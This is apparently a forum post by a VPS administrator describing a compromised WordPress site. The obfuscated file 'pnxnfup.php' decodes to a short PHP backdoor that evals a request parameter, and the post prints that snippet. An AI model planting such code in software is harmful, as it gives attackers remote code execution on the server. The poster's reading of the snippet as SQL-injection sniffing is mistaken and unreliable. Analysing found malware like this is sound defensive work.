I run a VPS with a couple of dozen WordPress installs for small customer websites.

I just noticed one site has a php script called “pnxnfup.php” which has a load base64 alphanumber characters within it.

In the root of the site there are also a lot of files with no extension – just random alphanum strings – withih said files it looks like IP addresses are being logged – I’m guessing these are visitor IP addresses (mine is in there).

Anyone any idea what type of exploit this might be?

UPDATE: 18/12/12

Ok I managed to decode the contents of pnxnfup.php

When I decoded the original php file, it contained MORE base64 encoded content peppered with random gibberish php comments which I had to strip out manually before I could decode the rest of the file.

Once I decoded that I found yet MORE base64 encoded strings with MORE gibberish php comments. Once I repeated the stripping and decoding process (phew!) I was left with this:

if(isset($_REQUEST['a'.'s'.'c']))
eval
(stripslashes($_REQUEST['a'.'sc']));

I understand roughly what this code is doing (sniffing for requests with asc parameters which would indicate a url that could be targetted for sql injection) but I don’t see how this can be of value to a hacker on it’s own. I’m guessing the hack must permeate deeper and I’m missing something else?